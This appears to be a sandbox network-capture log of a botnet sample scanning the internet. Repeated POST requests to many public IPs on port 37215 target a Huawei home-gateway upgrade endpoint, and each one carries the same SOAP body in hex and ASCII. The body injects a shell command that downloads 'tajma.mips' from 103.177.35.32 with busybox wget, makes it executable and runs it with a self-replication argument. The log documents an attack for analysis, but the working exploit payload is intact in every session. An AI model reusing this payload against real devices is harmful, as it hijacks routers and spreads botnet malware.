                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3220192.168.2.233857657.128.208.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661565065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3221192.168.2.2339258157.46.5.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661662102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3222192.168.2.2332924195.155.19.15337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661669970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3223192.168.2.2348458157.46.145.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661674023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3224192.168.2.235941241.153.115.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661691904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3225192.168.2.2350876197.136.108.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661716938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3226192.168.2.2338824121.212.78.17837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661739111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3227192.168.2.233994841.100.89.8537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661746979 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3228192.168.2.234459041.168.210.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661752939 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3229192.168.2.2337554157.207.74.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661760092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
